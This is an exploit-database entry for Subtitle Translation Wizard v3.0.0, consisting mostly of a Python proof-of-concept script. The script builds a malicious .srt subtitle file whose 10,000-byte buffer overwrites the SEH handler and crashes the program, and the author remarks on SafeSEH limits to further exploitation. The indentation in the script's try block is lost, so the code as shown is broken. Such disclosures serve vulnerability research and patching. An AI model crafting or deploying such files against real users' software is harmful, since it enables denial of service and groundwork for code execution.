Subtitle Translation Wizard v3.0.0 SEH POC

2010-06-22T00:00:00
ID 1337DAY-ID-12856
Type zdt
Reporter Blake
Modified 2010-06-22T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            ==========================================
Subtitle Translation Wizard v3.0.0 SEH POC
==========================================


#!/usr/bin/python
 
# Exploit Title: Subtitle Translation Wizard v3.0.0 SEH POC
# Author: Blake
# Software Link:
http://www.upredsun.com/subtitle-translation/download/st-wizard-setup.exe
# Version: 3.0.0
# Tested on: Windows Vista running in VirtualBox
 
# SEH is overwritten but only unicode compatible pop pop ret addresses are
in st-wizard.exe (SafeSEH).
 
print "\n======================================"
print " Subtitle Translation Wizard v3.0.0 DoS "
print " Discovered by Blake "
print "======================================\n"
 
buffer = "\x41" * 10000
 
print "[+] Creating malicious srt file"
try:
file = open("poc.srt","w")
file.write("1\n" + "00:01:48,549 --> 00:01:50,404\n" + buffer)
file.close()
print "[+] File created"
except:
print "[x] Could not create file"
 
raw_input("\nPress any key to exit...\n")



#  0day.today [2018-01-10]  #